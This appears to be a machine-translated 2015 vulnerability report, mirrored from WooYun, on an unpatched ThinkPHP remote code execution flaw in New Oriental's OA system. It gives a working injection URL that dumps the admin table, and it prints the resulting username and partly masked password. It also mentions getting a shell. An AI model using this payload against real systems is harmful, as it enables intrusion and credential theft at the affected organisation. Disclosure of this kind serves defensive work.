New Oriental OA system patches timely thinkphp vulnerability to execute arbitrary system commands(getshell)-vulnerability warning-the black bar safety net

2015-01-24T00:00:00
ID MYHACK58:62201558351
Type myhack58
Reporter 路人甲@乌云
Modified 2015-01-24T00:00:00

Description

Brief description:

New Oriental OA system patch is not timely, the thinkphp vulnerability to execute arbitrary system commands(getshell)

Detailed description:

!

https://**. xdf. cn/mapp/index. php/module/action/param1/$%7B@print(var_dump(D(Admin)-%3Eselect()))%7D The results are as follows: --------- array(1) { [0]=> array(4) { ["id"]=> string(1) "1" ["username"]=> string(5) "admin" ["passwd"]=> string(1 0) "y***CN" ["createtime"]=> string(1 9) "2014-03-11 0 9:3 7:4 8" } }

!

!

!

Vulnerability proof:

A most simple technique, the upper knife......

!

Saw a lot of teachers online, didn't have the heart to continue to engage, all stop!

!

[1] [2] next